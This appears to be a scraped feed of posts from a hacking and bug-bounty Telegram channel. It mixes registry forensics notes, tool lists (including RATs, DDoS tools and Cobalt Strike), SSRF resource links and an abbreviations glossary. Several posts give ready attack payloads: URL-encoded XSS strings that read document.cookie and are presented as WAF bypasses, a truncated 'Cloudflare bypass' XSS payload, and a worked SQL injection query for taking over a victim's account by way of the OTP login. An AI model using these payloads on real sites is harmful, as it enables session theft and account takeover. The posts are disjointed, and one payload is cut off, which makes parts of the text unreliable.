Termux All Command [Telegram Group]

Windows Registry Forensics The Windows Registry is a centralized database that stores configuration settings and options for the Windows operating system. It contains information about hardware, software, user preferences, and system settings, crucial for the proper functioning of Windows. To open the Windows Registry, press Win + R, type "regedit", and press Enter Registry Structure: The Registry is organized in a hierarchical structure, comprising keys, subkeys, and values, allowing for efficient storage and retrieval of system settings and configurations on Windows platforms. • HKEY_CURRENT_USER • HKEY_USERS • HKEY_LOCAL_MACHINE • HKEY_CLASSES_ROOT • HKEY_CURRENT_CONFIG Access the Registry Hives Offline: A Registry hive is a top-level container in the Windows Registry that stores a specific category of system configuration data, such as user profiles, hardware settings, and software information. C:\Windows\System32\Config Registry Acquisition: Registry acquisition refers to the process of collecting and extracting information from the Windows Registry for forensic analysis or system troubleshooting purposes. Registry Acquisition Tools: KAPE, Autopsy, Registry Explorer Important Registry Keys: • System Information and System Accounts In forensic analysis, the initial step involves gathering system information to establish a foundational understanding of the system's configuration and activities. - OS Version - Current Control set - Computer Name - Time Zone Information - Network Interfaces and Past Networks - Autostart Programs (Autoruns) - SAM Hive and User Information • Knowledge of Files/Folders Windows maintains a list of recently accessed files for each user, visible in Windows Explorer for quick access. - Recent Files - Office Recent Files - ShellBags - Open/Save and LastVisited Dialog MRUs - Windows Explorer Address/Search Bars • Evidence of Execution Windows logs user-launched applications in the User Assist registry keys for statistical analysis, excluding command line executions, stored in the NTUSER hive under individual user GUIDs - UserAssist - ShimCache - AmCache - BAM/DAM • External Devices/USB device forensics This locations keep track of USB keys plugged into a system - Device identification - First/Last Times - USB device Volume Name - HKLM SYSTEM MountedDevices • Auditing Registry Through PowerShell - Get ChildItem -Path

COMPLETE ETHICAL HACKING Penetration Testing COURSE 📥 What You Will Learn - 🔋Introduction to Cyber Security 🔋Kali Linux Installation 🔋Mobile Hacking 🔋System Hacking 🔋Web Application Penetration Testing 🔋Wireless Hacking 🔋Open Source Intelligence 🔋Social Engineering 🔋Client Side Attacks 🔋Defense 🗃 Link - https://lnkd.in/dsh2zkmq

GoOsint A collectiom of Cybersecurity, Threat Intelligence and OSINT Resources : https://goosint.com/ A Cyber Security Search Engine For CTF and Bug Bounty : https://hackyx.io/

🐞 Learn SSRF 🐜 [+] https://portswigger.net/web-security/ssrf [X] https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery [*] https://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/ssrf [-] https://www.youtube.com/watch?v=1pyoYa79ejs ✅Tryhackme Lab:- 👉 1. https://tryhackme.com/r/room/ssrfqi 2. https://tryhackme.com/r/room/ssrfhr ✅A New Era Of SSRF - Exploiting Url Parsers:- 👉 https://www.youtube.com/watch?v=D1S-G8rJrEk ✅ Hackerone report :- 👉 1. https://github.com/reddelexc/hackerone-reports/blob/master/tops_by_bug_type/TOPSSRF.md ✅ Medium report :-👉 1. https://medium.com/techfenix/ssrf-server-side-request-forgery-worth-4913-my-highest-bounty-ever-7d733bb368cb 2. https://raymondlind.medium.com/ssrf-lfi-in-uploads-feature-a134aa467abf 3. Read And Add More ✅ 6-7 year old ssrf poc video :- 👉 poc :- https://www.youtube.com/playlist?list=PL9VLN4DOjAsjjAZiPf_vbGp9eGufX7lKY ✅ Automate :-👉 https://medium.com/@a1bi/ssrf-get-notified-on-discord-whenever-you-have-an-ssrf-5162a6daf8a3 ✅ All SSRF In One :- 👉 1. https://github.com/jdonsec/AllThingsSSRF 2. https://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/ssrf ✅ Tools :- 👉 1. https://github.com/zmap/zgrab 2. Collaborator Everywhere 3. SSRFmap ✅ SSRF EndPoint:- 👉 dest= path= window= next= site= reference= data= load= html= validate= page= return= callback= domain= feed= view= dir= request-baskets= dict= pdf= file= imageuri= url= key= .json oauth redirect= api= dashboard = config.= ✅ Bypass :- 👉 1. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery 2. Collect All bypass Techniques from twitter, medium or others sources and note down #bugbounty #ssrf #bugbountytips

🛠Best Hacking Tools by Category 🔰 Exploitation 1-Metasploit 2-Sqlmap 3-Core Imact 4-W3af 5-BeEF 6-Dradis 🔰 Phone_Hacking 1-Metasploit 2-Apktool 3-Droidjack 4-AndroRAT 5-Spynote 🔰 Server_Hacking 1-SQLmap 2-Jsql 3-Havij 4-Hydra 5-Metasploit 6-Armitage 7-Brupsuite 8-Owasp-ZAP 9-Netsparker 10-Acunetix 11-OpenVAS 🔰 DDoS 1-MDK3 2-LOIC 3-HULK 4-DDOSIM 5-Ufonet 6-Hping3 7-Xerxes 8-Hammer 9-Slowloris 10-Websploit 11-GoldenEye 12-Metasploit 13-Aireplay-ng 🔰 Forensics 1-COFEE 2-Volafox 3-Autopsy 4-Foremost 5-Hashdeep 6-Binwalk 🔰 Client_Hacking 1-Darkcomet 2-FatRat 3-Veil-Evasion 4-Shallter 5-Unicorn 6-Setoolkit 7-Armitage 8-BeEF-Framework 9-EmPyre 10-FakeImageExploiter 11-Pupy 12-DFU-Programmer 13-Cobalt Strike 14-Exploitpack 15-Gcat 16-Crowbar 🔰 Website_Hacking 1-Sn1per 2-Owasp-ZAP 3-Brupsuite 4-Netsparker 5-Acunetix 6-SQLmap 7-Xsser 8-WPScan 9-Joomrra 10-Joomscan 11-WPSeku 12-XSStrike 13-Kadimus 14-jexboss 15-CMSmap 16-brut3k1t 17-0d1n 18-CloudFail 19-Arachni 20-Nikto 21-Webscarab 22-Nmap 23-Vbscan 24-Sentry MBA 🔰 Network_Hacking 1-MITMf 2-Bettercap 3-Ettercap 4-Tcpdump 5-Wireshark 6-Driftnet 7-SSLstrip 8-Armitage 9-Metasploit 10-Xerosploit 11-Sparta 12-Hydra 🔰 Wireless_Hacking 1-Wifite 2-Airodump-ng 3-Aireplay-ng 4-Wash 5-WiFi Pumpkin 6-Wifiphisher 7-Fluxion 8-Infernal Twin 9-WPSpin 🔰 Reverse_Engeenering 1-OWASP-ZSC 2-OllyDBG 3-Apktool 🔰 Information_Gathering 1-Enum 2-Recon 3-Whois 4-Email Contact 5-Phone Contact 6-Service Status 7-Protocol Analysis

Javascript for Pentesters By Pentester Academy : https://mega.nz/folder/ya5W0Lxa#Ocx3Gbtkv8PqSzzSpG6PfA

Important Abbreviations *CIA - Confidentiality, Integrity, Availability *IDS - Intrusion Detection System *IPS - Intrusion Prevention System *WAF - Web Application Firewall *PII - Personal Identifiable Information *DoS - Denial of Service *DDoS - Distributed Denial of Service *DNS - Domain Name System *ZTA - Zero Trust Architecture *NAT - Network Address Translation *CTF - Capture the Flag *ACL - Access Control List *CDN - Content Delivery Network *CVE - Common Vulnerabilities and Exposures *RAT - Remote Access Trojan *APT - Advanced Persistent Threat *ATP - Advanced Threat Protection *SSO - Single Sign-on *URL - Uniform Resource Locator *TLS - Transport Layer Security *ARP - Address Resolution Protocol *RDP - Remote Desktop Protocol *FTP - File Transfer Protocol *SFTP - Secure File Transfer Protocol *HTTP - Hypertext Transfer Protocol *HTTPS - Hypertext Transfer Protocol Secure *LDAP - Lightweight Directory Access Protocol *MFA - Multi-factor Authentication *IAM - Identity and Access Management *SIEM - Security Information and Event Management *SAM - Security Account Manager *MDM - Mobile Device Management *XXS - Cross Site Scripting *XSRF - Cross Site Request Forgery *DRaaS - Disaster Recovery as a Service *DLP - Data Loss Prevention *TCP - Transmission Control Protocol *SNMP - Simple Network Management Protocol *L2TP - Layer 2 Tunneling Protocol *SOC - Security Operations Center EDR - Endpoint Detection and Response MDR - Managed Detection and Response KMS - Key Management Service TOR - The Onion Router UEBA - User and Entity Behavior Analytics UEFI - Unified Extensible Firmware Interface RFI - Remote File Inclusion SSID - Service Set Identifier LAN - Local Area Network WAN - Wide Area Network VLAN - Virtual Local Area Network PGP - Pretty Good Privacy MiTM - Man in the Middle Attack CA - Certificate Authority MAC - Mandatory Access Control PUA - Potential Unwanted Application ECDH - Elliptic Curve Deffie-Hellman BYOD - Bring Your Own Device GDPR - General Data Protection Regulation ADFS - Active Directory Federation Service EPP - Endpoint Protection Platform DMARC - Domain Based Message Authentication, Reporting and Conformance UAC - User Account Control CLI - Command Line Interface

403JUMP is a tool designed for penetration testers and bug bounty hunters to audit the security of web applications. It aims to bypass HTTP 403 (Forbidden) pages using various techniques. : https://github.com/trap-bytes/403jump

BreachHunter is a powerful OSINT (Open Source Intelligence) tool designed for cybersecurity professionals, investigators, and ethical hackers to efficiently search for leaked data using the DeHashed API link: https://lnkd.in/gx3p9bB6 #CyberSecurity #osint #databreach

$$$ Cross-Site Scripting (XSS) i2lte%22%3e%3cscript%3ealert(1)%3c%2fscript%3eayawz hashtag#cybersecurity

SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. Empowering cybersecurity professionals with the capability to swiftly identify and apply known and test exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats. https://github.com/xaitax/SploitScan

New Xss Fly Under Radar Cloudflare Bypass 🧱 Payload : ">

Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' #BugBounty #bugbountytips

SQL Injection to Account Takeover Manually :) 1. Enter mobile number to login intercept {"mobile_number":"8888888888"} >> 200 {"mobile_number":"8888888888'"} >> 500 {"mobile_number":"8888888888''"} >> 200 2. Final Query: 8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') -- 2024-04-03 21:20:55 >> Exact time and date 1 >> attempts you can see the 200 response last you can login with the 1110 OTP and get access to the victim account :)

Trolling again a friendly WAF. Payloads: 🕵🏽Attacker: 1%22onfocus=%27alert%28document.cookie%29%27%20autofocus= 🧱 WAF: no XSS plz. 400 Bad Request 🕵🏽 Attacker: 1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus= 🧱 WAF: nice XSS go ahead. 200 OK

Public Bug Bounty Programs [Domain,Subdomain] https://lnkd.in/da8Q7H6m Public Bug Bounty Platforms Around The World https://lnkd.in/dYvW-zFs Public Bug Bounty/ Penetration Testing Reports https://lnkd.in/dgRbHSx9 https://lnkd.in/dXj8r9Kg Bug Bounty Books https://lnkd.in/dngkysfp https://lnkd.in/dgybNmRF Bug Bounty Youtube Channel https://lnkd.in/dnETBsa7 https://lnkd.in/dQGYXTfP https://lnkd.in/dhiNmJnP https://lnkd.in/d8kgs2rC https://lnkd.in/dm6Hd5q2 Bug Bounty Hunter Twitter/Blog/etc https://lnkd.in/d4QyRy4v https://lnkd.in/dZpPSzSS https://m0chan.github.io/ https://lnkd.in/dQHGFPEA http://ele7enxxh.com/ https://lnkd.in/dqQHCSer https://lnkd.in/dPv7VHew https://lnkd.in/dvNpt2FA